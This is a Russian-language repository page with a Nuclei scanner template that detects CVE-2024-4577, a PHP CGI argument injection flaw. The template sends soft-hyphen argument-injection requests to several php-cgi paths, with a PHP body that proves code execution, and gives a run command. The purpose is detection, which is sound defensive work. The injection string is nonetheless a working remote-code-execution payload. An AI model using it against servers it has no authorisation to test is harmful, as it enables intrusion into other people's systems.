
Шаблон Nuclei для обнаружения уязвимости внедрения аргументов PHP CGI CVE-2024-4577, позволяющий проводить автоматическое тестирование RCE с помощью специально подготовленных HTTP-запросов и сопоставления ответов.
Этот репозиторий содержит шаблон Nuclei для обнаружения уязвимости внедрения аргументов PHP CGI, известной как CVE-2024-4577.
id: CVE-2024-4577
info:
name: CVE-2024-4577 PHP CGI Argument Injection
author: Hüseyin TINTAŞ
severity: critical
description: >
CVE-2024-4577 Уязвимость внедрения аргументов PHP CGI.
Этот шаблон проверяет, содержит ли ответ "CVE_2024_4577_TEST", что указывает на успешное внедрение.
tags: cve,cve2024,php,cgi,rce,cve2024-4577
http:
- method: POST
path:
- "{{BaseURL}}/cgi-bin/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/cgi-bin/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/php-cgi/php.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
- "{{BaseURL}}/index.test?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
headers:
User-Agent: "curl/8.3.0"
Accept: "*/*"
Content-Type: "application/x-www-form-urlencoded"
Connection: "keep-alive"
body: |
<?php echo md5("CVE_2024_4577_TEST"); ?>
matchers:
- type: word
part: body
words:
- "83946a388fdf6cd2707eed8550575a76"
Чтобы использовать этот шаблон с Nuclei, сохраните содержимое шаблона в файл с именем CVE-2024-4577.yaml и выполните следующую команду:
nuclei -t CVE-2024-4577.yaml -u <target-url>
Замените <target-url> на URL цели, которую вы хотите просканировать.
По любым вопросам или за дополнительной информацией вы можете связаться со мной через: